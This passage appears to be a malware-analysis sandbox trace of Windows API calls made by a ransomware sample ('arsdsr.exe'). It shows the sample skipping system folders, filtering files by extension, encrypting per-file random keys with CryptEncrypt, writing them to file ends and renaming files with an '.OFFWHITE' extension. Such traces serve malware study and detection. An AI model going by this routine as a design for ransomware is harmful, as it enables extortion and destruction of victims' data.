lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.117] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.117] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Music\\" | out: lpString1="C:/Users\\Default\\Music\\") returned="C:/Users\\Default\\Music\\" [0153.117] lstrcatW (in: lpString1="C:/Users\\Default\\Music\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Music\\desktop.ini") returned="C:/Users\\Default\\Music\\desktop.ini" [0153.117] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.117] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.117] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.117] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.117] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.117] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.117] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.117] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.117] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.118] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.118] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0153.118] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.118] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2=".") returned 1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="..") returned 1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="...") returned 1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="windows") returned -1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="$recycle.bin") returned 1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="rsa") returned -1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="ntuser.dat") returned -1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="programdata") returned -1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="appdata") returned 1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="program files") returned -1 [0153.118] lstrcmpiW (lpString1="My Documents", lpString2="program files (x86)") returned -1 [0153.118] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.118] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="My Documents" | out: lpString1="C:/Users\\Default\\My Documents") returned="C:/Users\\Default\\My Documents" [0153.118] lstrcatW (in: lpString1="C:/Users\\Default\\My Documents", lpString2="\\" | out: lpString1="C:/Users\\Default\\My Documents\\") returned="C:/Users\\Default\\My Documents\\" [0153.118] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\My Documents\\" | out: lpString1="C:/Users\\Default\\My Documents\\") returned="C:/Users\\Default\\My Documents\\" [0153.118] lstrcatW (in: lpString1="C:/Users\\Default\\My Documents\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\My Documents\\*.*") returned="C:/Users\\Default\\My Documents\\*.*" [0153.118] FindFirstFileW (in: lpFileName="C:/Users\\Default\\My Documents\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0153.118] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2=".") returned 1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="..") returned 1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="...") returned 1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="windows") returned -1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="$recycle.bin") returned 1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="rsa") returned -1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="ntuser.dat") returned -1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="programdata") returned -1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="appdata") returned 1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="program files") returned -1 [0153.119] lstrcmpiW (lpString1="NetHood", lpString2="program files (x86)") returned -1 [0153.119] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.119] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="NetHood" | out: lpString1="C:/Users\\Default\\NetHood") returned="C:/Users\\Default\\NetHood" [0153.119] lstrcatW (in: lpString1="C:/Users\\Default\\NetHood", lpString2="\\" | out: lpString1="C:/Users\\Default\\NetHood\\") returned="C:/Users\\Default\\NetHood\\" [0153.119] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\NetHood\\" | out: lpString1="C:/Users\\Default\\NetHood\\") returned="C:/Users\\Default\\NetHood\\" [0153.119] lstrcatW (in: lpString1="C:/Users\\Default\\NetHood\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\NetHood\\*.*") returned="C:/Users\\Default\\NetHood\\*.*" [0153.119] FindFirstFileW (in: lpFileName="C:/Users\\Default\\NetHood\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0153.119] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0153.119] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0153.119] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0153.119] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="...") returned 1 [0153.119] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="windows") returned -1 [0153.119] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="$recycle.bin") returned 1 [0153.119] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="rsa") returned -1 [0153.119] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0153.120] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="..") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="...") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="windows") returned -1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="$recycle.bin") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="rsa") returned -1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="ntuser.dat") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="programdata") returned -1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="appdata") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="program files") returned -1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="program files (x86)") returned -1 [0153.120] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.120] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="NTUSER.DAT.LOG" | out: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG") returned="C:/Users\\Default\\NTUSER.DAT.LOG" [0153.120] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.120] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.120] PathFindExtensionW (pszPath="NTUSER.DAT.LOG") returned=".LOG" [0153.120] lstrcmpiW (lpString1=".LOG", lpString2=".exe") returned 1 [0153.120] lstrcmpiW (lpString1=".LOG", lpString2=".log") returned 0 [0153.120] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="...") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="windows") returned -1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="$recycle.bin") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="rsa") returned -1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntuser.dat") returned 1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="programdata") returned -1 [0153.120] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="appdata") returned 1 [0153.121] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="program files") returned -1 [0153.121] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="program files (x86)") returned -1 [0153.121] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.121] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="NTUSER.DAT.LOG1" | out: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG1") returned="C:/Users\\Default\\NTUSER.DAT.LOG1" [0153.121] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.121] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.121] PathFindExtensionW (pszPath="NTUSER.DAT.LOG1") returned=".LOG1" [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".exe") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".log") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".cab") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".cmd") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".com") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".cpl") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".ini") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".dll") returned 1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".url") returned -1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".ttf") returned -1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".mp3") returned -1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".pif") returned -1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".mp4") returned -1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".OFFWHITE") returned -1 [0153.121] lstrcmpiW (lpString1=".LOG1", lpString2=".msi") returned -1 [0153.121] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.121] GetProcessHeap () returned 0x500000 [0153.121] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526e28 [0153.121] CreateFileW (lpFileName="C:/Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0153.122] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=189440) returned 1 [0153.122] GetProcessHeap () returned 0x500000 [0153.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0153.122] GetProcessHeap () returned 0x500000 [0153.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0153.122] GetProcessHeap () returned 0x500000 [0153.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0153.122] GetProcessHeap () returned 0x500000 [0153.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0153.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.122] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0153.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.122] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0153.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.123] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e990*=0x100) returned 1 [0153.123] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.123] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.123] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e98c*=0x100) returned 1 [0153.123] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.123] SetLastError (dwErrCode=0x0) [0153.123] WriteFile (in: hFile=0x220, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.139] GetLastError () returned 0x0 [0153.139] GetLastError () returned 0x0 [0153.139] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.139] WriteFile (in: hFile=0x220, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.139] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2e600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.139] WriteFile (in: hFile=0x220, lpBuffer=0x526e28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x526e28*, lpNumberOfBytesWritten=0x295ebcc*=0x8, lpOverlapped=0x0) returned 1 [0153.139] GetProcessHeap () returned 0x500000 [0153.139] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2e400) returned 0x5667c8 [0153.139] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.139] ReadFile (in: hFile=0x220, lpBuffer=0x5667c8, nNumberOfBytesToRead=0x2e400, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesRead=0x295ebc0*=0x2e400, lpOverlapped=0x0) returned 1 [0153.156] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.156] WriteFile (in: hFile=0x220, lpBuffer=0x5667c8*, nNumberOfBytesToWrite=0x2e400, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesWritten=0x295ebcc*=0x2e400, lpOverlapped=0x0) returned 1 [0153.156] GetProcessHeap () returned 0x500000 [0153.156] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5667c8 | out: hHeap=0x500000) returned 1 [0153.157] CloseHandle (hObject=0x220) returned 1 [0153.157] GetProcessHeap () returned 0x500000 [0153.157] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0153.157] GetProcessHeap () returned 0x500000 [0153.157] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0153.157] GetProcessHeap () returned 0x500000 [0153.157] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0153.157] GetProcessHeap () returned 0x500000 [0153.157] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0153.157] lstrcpyW (in: lpString1=0x295e9b8, lpString2="C:/Users\\Default\\NTUSER.DAT.LOG1" | out: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG1") returned="C:/Users\\Default\\NTUSER.DAT.LOG1" [0153.157] lstrcatW (in: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG1", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG1.OFFWHITE") returned="C:/Users\\Default\\NTUSER.DAT.LOG1.OFFWHITE" [0153.157] MoveFileW (lpExistingFileName="C:/Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="C:/Users\\Default\\NTUSER.DAT.LOG1.OFFWHITE" (normalized: "c:\\users\\default\\ntuser.dat.log1.offwhite")) returned 1 [0153.158] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x9012aa61, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="...") returned 1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="windows") returned -1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="$recycle.bin") returned 1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="rsa") returned -1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat") returned 1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="programdata") returned -1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="appdata") returned 1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="program files") returned -1 [0153.158] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="program files (x86)") returned -1 [0153.158] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.158] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="NTUSER.DAT.LOG2" | out: lpString1="C:/Users\\Default\\NTUSER.DAT.LOG2") returned="C:/Users\\Default\\NTUSER.DAT.LOG2" [0153.159] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.159] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.159] PathFindExtensionW (pszPath="NTUSER.DAT.LOG2") returned=".LOG2" [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".exe") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".log") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".cab") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".cmd") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".com") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".cpl") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".ini") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".dll") returned 1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".url") returned -1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".ttf") returned -1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".mp3") returned -1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".pif") returned -1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".mp4") returned -1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".OFFWHITE") returned -1 [0153.159] lstrcmpiW (lpString1=".LOG2", lpString2=".msi") returned -1 [0153.159] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.159] GetProcessHeap () returned 0x500000 [0153.159] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e18 [0153.159] CreateFileW (lpFileName="C:/Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0153.162] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=0) returned 1 [0153.162] GetProcessHeap () returned 0x500000 [0153.162] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0153.162] GetProcessHeap () returned 0x500000 [0153.162] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0153.162] GetProcessHeap () returned 0x500000 [0153.162] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0153.162] GetProcessHeap () returned 0x500000 [0153.162] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0153.162] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.162] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.162] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0153.162] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.162] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.162] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0153.162] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.162] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.162] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e990*=0x100) returned 1 [0153.163] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.163] lstrcmpiW (lpString1="kernel32.dll", 